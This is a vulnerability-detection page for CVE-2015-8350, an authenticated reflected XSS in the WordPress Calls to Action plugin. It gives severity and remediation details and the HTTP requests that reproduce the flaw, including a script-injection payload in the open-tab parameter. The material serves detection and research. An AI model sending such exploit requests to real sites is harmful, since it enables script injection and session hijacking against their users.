🔙 목록으로 돌아가기

CVE-2015-8350: WordPress Calls to Action <=2.4.3 - Authenticated Reflected XSS

TitleWordPress Calls to Action <=2.4.3 - Authenticated Reflected XSS
Author0x_Akoko
SeverityMedium
ImpactAttackers can execute arbitrary scripts in the context of the affected website, leading to session hijacking, defacement, or redirection.
RemediationUpdate to version 2.5.1 or later to fix the vulnerabilities.
CVSS Score6.1
EPSS Score0.00984
CVE IDCVE-2015-8350
CWE IDCWE-79
Tags seclists cve cve2015 wordpress wp-plugin xss reflected authenticated

🔍 Vulnerability Description

Calls to Action plugin before 2.5.1 for WordPress contains stored XSS caused by unsanitized input in open-tab parameter in wp-admin/edit.php and wp-cta-variation-id parameter in ab-testing-call-to-action-example/, letting remote attackers inject arbitrary web script or HTML, exploit requires sending crafted requests.

🌐 HTTP Request

GET /wp-login.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/117.0
Connection: close
Accept-Encoding: gzip
POST /wp-login.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Connection: close
Content-Length: 38
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

log=R1kyvO&pwd=BNATyo&wp-submit=Log+In
GET /wp-admin/edit.php?post_type=wp-call-to-action&page=wp_cta_global_settings&open-tab='><script>alert(document.domain)</script> HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0
Connection: close
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2015/CVE-2015-8350.yaml

🦈 Packet Capture: ⬇️ Download cve-2015-8350.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A